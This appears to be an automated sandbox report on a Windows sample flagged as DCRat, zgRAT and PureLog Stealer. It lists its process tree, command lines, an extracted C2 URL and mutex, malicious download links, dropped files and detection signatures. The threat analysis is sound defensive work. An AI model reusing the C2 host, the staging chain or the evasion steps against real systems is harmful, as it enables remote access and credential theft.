Edit tour

Windows Analysis Report
wmdqEYgW2i.exe

Overview

General Information

Sample name:	wmdqEYgW2i.exe renamed because original name is a hash value
Original sample name:	8576F95A0E018025E8B46367AE311E83.exe
Analysis ID:	1575287
MD5:	8576f95a0e018025e8b46367ae311e83
SHA1:	0d1c5e913dcc60910e454416e3c149c9d05f02f5
SHA256:	b8c9a273058d6214aeccc822fb5f304edc734bd57a4ac43450feeacef70fafb8
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ipconfig to lookup or modify the Windows network settings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wmdqEYgW2i.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\wmdqEYgW2i.exe" MD5: 8576F95A0E018025E8B46367AE311E83)

Bootstrapper.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" MD5: 02C70D9D6696950C198DB93B7F6A835E)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7660 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 7740 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

WerFault.exe (PID: 2256 cmdline: C:\Windows\system32\WerFault.exe -u -p 7532 -s 2204 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

DCRatBuild.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 4680B7118D5D69D9D9ACA7265A07FA8B)

wscript.exe (PID: 7640 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Mscrt.exe (PID: 7884 cmdline: "C:\ComponentReviewperfmonitor/Mscrt.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)

cmd.exe (PID: 8064 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8120 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8136 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

Mscrt.exe (PID: 3084 cmdline: "C:\ComponentReviewperfmonitor\Mscrt.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
wmdqEYgW2i.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
wmdqEYgW2i.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
\Device\ConDrv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ComponentReviewperfmonitor\Mscrt.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ComponentReviewperfmonitor\Mscrt.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\Registry.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\Registry.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.1689383384.0000000006112000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000000.1735972234.0000000000DB2000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1690322216.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1687516055.00000000033CC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Bootstrapper.exe PID: 7532	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Mscrt.exe PID: 7884	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Mscrt.exe PID: 3084	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.DCRatBuild.exe.6a74700.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.DCRatBuild.exe.6a74700.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.DCRatBuild.exe.6160700.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.DCRatBuild.exe.6160700.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.wmdqEYgW2i.exe.341a70f.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.wmdqEYgW2i.exe.341a70f.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.0.Mscrt.exe.db0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
10.0.Mscrt.exe.db0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.wmdqEYgW2i.exe.51f97b.3.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.wmdqEYgW2i.exe.51f97b.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.wmdqEYgW2i.exe.4d1294.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.DCRatBuild.exe.6160700.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.DCRatBuild.exe.6160700.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.wmdqEYgW2i.exe.409294.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.wmdqEYgW2i.exe.409294.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.wmdqEYgW2i.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.wmdqEYgW2i.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ComponentReviewperfmonitor\Mscrt.exe, ProcessId: 7884, TargetFilename: C:\ComponentReviewperfmonitor\WmiPrvSE.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7584, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe" , ProcessId: 7640, ProcessName: wscript.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, ParentProcessId: 7532, ParentProcessName: Bootstrapper.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7660, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T04:17:26.419865+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49743	172.67.185.214	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T04:17:08.455721+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	104.21.93.27	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wmdqEYgW2i.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	Avira URL Cloud: Label: malware
Source: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.	Avira URL Cloud: Label: malware
Source: http://nutipa.ru/_authGamewordpress.php	Avira URL Cloud: Label: malware
Source: http://nutipa.ru/	Avira URL Cloud: Label: malware
Source: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Avira URL Cloud: Label: malware
Source: http://nutipa.ru	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\DuJNBeJX.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GtXEsNdN.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\AJexuQye.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\JInMuEEa.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\PAQlXkJO.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\Registry.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GoOOBNnj.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}

Multi AV Scanner detection for domain / URL

Source: nutipa.ru	Virustotal: Detection: 5%			Perma Link
Source: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.	Virustotal: Detection: 5%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	ReversingLabs: Detection: 83%
Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe	ReversingLabs: Detection: 83%
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\Registry.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\tQRjIvxcBsFMaEOtv.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\tQRjIvxcBsFMaEOtv.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\AJexuQye.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\DXuFwIar.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\DuJNBeJX.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\EvzfQQCl.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\FwwvWNOS.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\JInMuEEa.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\McddlGOE.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PAQlXkJO.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\SDCUsTNK.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\SedCyZmq.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TaRdOVJt.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TrGcehJI.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\WUTtFVnj.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XqUSVQdy.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\aLKjMSnc.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\cNwShBsX.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\kPeZMpiY.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\nkUqDrtD.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\oFVQTmjS.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\tPFHKnhJ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\uMgPgnwD.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\yxUOovbm.log	ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Source: wmdqEYgW2i.exe	ReversingLabs: Detection: 97%
Source: wmdqEYgW2i.exe	Virustotal: Detection: 91%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\FwwvWNOS.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Joe Sandbox ML: detected
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Joe Sandbox ML: detected
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ASBxeDSb.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DuJNBeJX.log	Joe Sandbox ML: detected
Source: C:\ComponentReviewperfmonitor\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KjOuzKdG.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GtXEsNdN.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AJexuQye.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JInMuEEa.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KrxNetEL.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GSwVnIEh.log	Joe Sandbox ML: detected
Source: C:\Recovery\Registry.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GoOOBNnj.log	Joe Sandbox ML: detected
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Joe Sandbox ML: detected
Source: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wmdqEYgW2i.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-1PskwlBIP03G3dSi5snm","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 0000000A.00000002.1818125843.000000001374A000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://nutipa.ru/","_authGamewordpress"]]

Source: wmdqEYgW2i.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.4:49734 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: wmdqEYgW2i.exe, DCRatBuild.exe.0.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC9B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Bootstrapper.exe, 00000001.00000002.2101631822.00000190330B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Bootstrapper.PDB source: Bootstrapper.exe, 00000001.00000002.2101631822.00000190330E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Bootstrapper.exe, 00000001.00000002.2094313518.0000019018E12000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC9B000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00B1A69B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00B2C220

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49743 -> 172.67.185.214:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.64.130 104.21.64.130
Source: Joe Sandbox View	IP Address: 128.116.123.3 128.116.123.3
Source: Joe Sandbox View	IP Address: 172.67.185.214 172.67.185.214
Source: Joe Sandbox View	IP Address: 104.21.93.27 104.21.93.27

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.93.27:443

